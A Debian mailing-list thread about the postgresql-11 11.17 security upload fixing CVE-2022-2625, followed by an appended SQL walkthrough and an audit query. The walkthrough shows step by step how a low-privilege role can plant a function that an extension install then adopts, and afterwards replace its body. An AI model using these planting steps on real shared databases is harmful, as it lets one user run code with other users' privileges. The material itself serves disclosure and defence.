Re: postgresql-11 11.17-0+deb10u1

2022-08-11 Thread Emilio Pozuelo Monfort

Hi Christoph,

On 11/08/2022 14:10, Christoph Berg wrote:

> Hi,
> 
> I just uploaded postgresql-11, if anyone wants to do the LTS paperwork for that:
> 
> postgresql-11 (11.17-0+deb10u1) buster-security; urgency=medium
> 
>   * New upstream version.
> 
> + Do not let extension scripts replace objects not already belonging to
>   the extension (Tom Lane) (CVE-2022-2625)
> 
>   This change prevents extension scripts from doing CREATE OR REPLACE if
>   there is an existing object that does not belong to the extension.  It
>   also prevents CREATE IF NOT EXISTS in the same situation.  This prevents
>   a form of trojan-horse attack in which a hostile database user could
>   become the owner of an extension object and then modify it to compromise
>   future uses of the object by other users.  As a side benefit, it also
>   reduces the risk of accidentally replacing objects one did not mean to.
> 
>   The PostgreSQL Project thanks Sven Klemm for reporting this problem.
> 
>  -- Christoph Berg   Thu, 11 Aug 2022 14:03:50 +0200


Thanks for the update. I have just sent out the announcement.

Cheers,
Emilio



Accepted postgresql-11 11.17-0+deb10u1 (source) into oldstable

2022-08-11 Thread Debian FTP Masters
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Thu, 11 Aug 2022 14:03:50 +0200
Source: postgresql-11
Architecture: source
Version: 11.17-0+deb10u1
Distribution: buster-security
Urgency: medium
Maintainer: Debian PostgreSQL Maintainers 
Changed-By: Christoph Berg 
Changes:
 postgresql-11 (11.17-0+deb10u1) buster-security; urgency=medium
 .
   * New upstream version.
 .
 + Do not let extension scripts replace objects not already belonging to
   the extension (Tom Lane) (CVE-2022-2625)
 .
   This change prevents extension scripts from doing CREATE OR REPLACE if
   there is an existing object that does not belong to the extension.  It
   also prevents CREATE IF NOT EXISTS in the same situation.  This prevents
   a form of trojan-horse attack in which a hostile database user could
   become the owner of an extension object and then modify it to compromise
   future uses of the object by other users.  As a side benefit, it also
   reduces the risk of accidentally replacing objects one did not mean to.
 .
   The PostgreSQL Project thanks Sven Klemm for reporting this problem.
Checksums-Sha1:
 3d880e497eca4196052f740963b3741479ff51a7 3745 postgresql-11_11.17-0+deb10u1.dsc
 553aff97123c8b48909ab8b49da2e2f141702d7e 20385599 postgresql-11_11.17.orig.tar.bz2
 4007541edd871dcfadd8bead6f97bfe88fd92ad5 28484 postgresql-11_11.17-0+deb10u1.debian.tar.xz
Checksums-Sha256:
 49d55b7a6e529bf4f7c14c114af2429af8fb1d7656481300e39e892c1668a100 3745 postgresql-11_11.17-0+deb10u1.dsc
 6e984963ae0765e61577995103a7e6594db0f0bd01528ac123e0de4a6a4cb4c4 20385599 postgresql-11_11.17.orig.tar.bz2
 2e21624784f0991aa3e1b0bd09861848a637a7311938634c70bc8f6743e9fad3 28484 postgresql-11_11.17-0+deb10u1.debian.tar.xz
Files:
 ded96875b9d955ebfdd6386989fee783 3745 database optional postgresql-11_11.17-0+deb10u1.dsc
 34d2faf0efe356f4d881cea17607479c 20385599 database optional postgresql-11_11.17.orig.tar.bz2
 4be3c5516108a5b8ae2e1b60b2ef1235 28484 database optional postgresql-11_11.17-0+deb10u1.debian.tar.xz

-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----



postgresql-11 11.17-0+deb10u1

2022-08-11 Thread Christoph Berg
Hi,

I just uploaded postgresql-11, if anyone wants to do the LTS paperwork for that:

postgresql-11 (11.17-0+deb10u1) buster-security; urgency=medium

  * New upstream version.

+ Do not let extension scripts replace objects not already belonging to
  the extension (Tom Lane) (CVE-2022-2625)

  This change prevents extension scripts from doing CREATE OR REPLACE if
  there is an existing object that does not belong to the extension.  It
  also prevents CREATE IF NOT EXISTS in the same situation.  This prevents
  a form of trojan-horse attack in which a hostile database user could
  become the owner of an extension object and then modify it to compromise
  future uses of the object by other users.  As a side benefit, it also
  reduces the risk of accidentally replacing objects one did not mean to.

  The PostgreSQL Project thanks Sven Klemm for reporting this problem.

 -- Christoph Berg   Thu, 11 Aug 2022 14:03:50 +0200


Thanks,
Christoph
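The changelog text carried by all three messages above describes the CVE-2022-2625 trojan-horse pattern only in prose. The following SQL is an added example, not from the Debian thread or from the PostgreSQL project, that walks through that pattern step by step. It assumes a hypothetical extension `demo_ext` whose install script uses `CREATE OR REPLACE FUNCTION`, a hypothetical low-privilege role `mallory`, and that `mallory` has CREATE privilege on the schema the script targets (the default for `public` in PostgreSQL 11). The final query is an audit check, also added here, for extension member functions owned by someone other than the extension's owner.

```sql
-- Constructed walkthrough of the CVE-2022-2625 pattern. Names (demo_ext,
-- demo_double, mallory) are hypothetical; nothing here is project code.
--
-- Hypothetical contents of demo_ext--1.0.sql, installed on the server:
--   CREATE OR REPLACE FUNCTION public.demo_double(x int) RETURNS int
--     LANGUAGE sql IMMUTABLE AS 'SELECT x * 2';

-- Step 1: a low-privilege user who can CREATE in the target schema plants
-- an object with exactly the name and signature the script will later use.
SET ROLE mallory;
CREATE FUNCTION public.demo_double(x int) RETURNS int
  LANGUAGE sql AS 'SELECT x * 2';
RESET ROLE;

-- Step 2: the administrator installs the extension as superuser.
-- Before 11.17: CREATE OR REPLACE overwrites the body, records the function
--   as a member of demo_ext, but leaves mallory as its owner.
-- From 11.17 (the CVE-2022-2625 fix): CREATE EXTENSION fails here because
--   the existing object does not belong to the extension. The same applies
--   to CREATE ... IF NOT EXISTS in an extension script.
CREATE EXTENSION demo_ext;

-- Step 3 (pre-fix servers only): mallory still owns the function and may
-- replace its body. Every later caller of public.demo_double() now runs
-- code of mallory's choosing with the caller's own privileges.
SET ROLE mallory;
CREATE OR REPLACE FUNCTION public.demo_double(x int) RETURNS int
  LANGUAGE sql AS 'SELECT x * 3';   -- any body mallory wants; visibly changed
RESET ROLE;

-- Audit check (added here): extension member functions whose owner is not
-- the extension's owner. Any row is worth investigating; on a server that
-- installed extensions before upgrading to 11.17, such objects are not
-- repaired by the fix and remain under the planter's control.
SELECT e.extname,
       d.objid::regprocedure AS member,
       r.rolname             AS owner
FROM pg_depend d
JOIN pg_extension e ON e.oid = d.refobjid
JOIN pg_proc      p ON p.oid = d.objid
JOIN pg_roles     r ON r.oid = p.proowner
WHERE d.refclassid = 'pg_extension'::regclass
  AND d.classid    = 'pg_proc'::regclass
  AND d.deptype    = 'e'
  AND p.proowner  <> e.extowner;
```

Run this as superuser against a throwaway database. The audit query covers functions only; the same `pg_depend` join with `pg_class`, `pg_type` or `pg_operator` in place of `pg_proc` finds planted tables, types or operators. Because the 11.17 change only affects what extension scripts may do from now on, it does not undo membership already recorded for objects planted earlier, which is why the check is worth running once after the upgrade.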